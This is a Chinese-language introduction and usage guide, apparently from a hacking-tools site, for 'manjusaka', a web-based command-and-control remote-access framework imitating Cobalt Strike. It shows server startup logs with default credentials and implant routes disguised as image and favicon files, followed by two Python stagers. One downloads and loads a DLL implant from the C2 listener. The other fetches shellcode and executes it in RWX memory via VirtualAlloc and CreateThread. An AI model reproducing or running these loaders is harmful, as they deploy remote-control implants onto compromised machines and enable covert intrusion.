===================================
0x01 工具介绍
一款基于WEB界面的仿CobaltStrike C2远控。
0x02 安装与使用
1、配置conf.toml 运行主文件
[ ]
[2022/09/14 15:57:21 初始用户: manjusaka 密码: ZbFCa2L2LRd5 ]
[2022/09/14 15:57:21 创建项目: 公共项目 没有归属的npc放在这个项目里面 ]
[2022/09/14 15:57:21 监听项目路由: VHOS5vqN ]
[2022/09/14 15:57:21 NPS监听地址 :3200 ]
[2022/09/14 15:57:21 NPU后台地址 : manjusaka ]
[2022/09/14 15:57:21 NPC监听地址 :801 ]
[2022/09/14 15:57:21 NPC交互路由 : /:target/favicon.ico ]
[2022/09/14 15:57:21 NPC下载路由 : /:target/assert/:sys/bg.jpg ]
[2022/09/14 15:57:21 NPC文件路由 : /images/:fid/logo.png ]
2、访问地址为
http://192.168.93.217:3200/manjusaka
3、根据项目 生成npc 可以直接使用exe或elf格式的npc。也可以使用其它语言加载npc母体 比如使用python加载npc母体dll,或者使用shellcode内存加载的形式
import requests
from ctypes import cdll
res = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/dll/x64/bg.jpg")
with open("a.dll","wb") as f:
f.write(res.content)
cdll.LoadLibrary("a.dll").main()
import requests
import ctypes
shellcode = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/bin/x64/bg.jpg").content
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, shellcode, len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
0x03
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...